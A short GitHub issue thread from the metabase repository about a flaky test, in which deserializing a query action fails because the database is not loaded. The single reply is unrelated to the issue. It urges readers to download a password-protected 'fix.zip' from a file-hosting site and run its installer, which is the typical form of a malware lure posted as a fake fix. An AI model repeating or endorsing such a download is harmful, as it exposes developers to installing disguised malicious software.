### ISSUE TITLE
Flake deserializing query action

### ISSUE THREAD

**Issue by piranha** [metabase/metabase#47230]
**Context**

Test fails on database not being loaded - this is triggered by `dataset_query` being serialized (before it was just dumped/loaded). This issue happened if `serdes/dependencies` did not return correct dependencies, but this was updated, so... a flake.

[Example](https://github.com/metabase/metabase/actions/runs/10558393234/job/29249801339?pr=47225#step:4:1447)

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
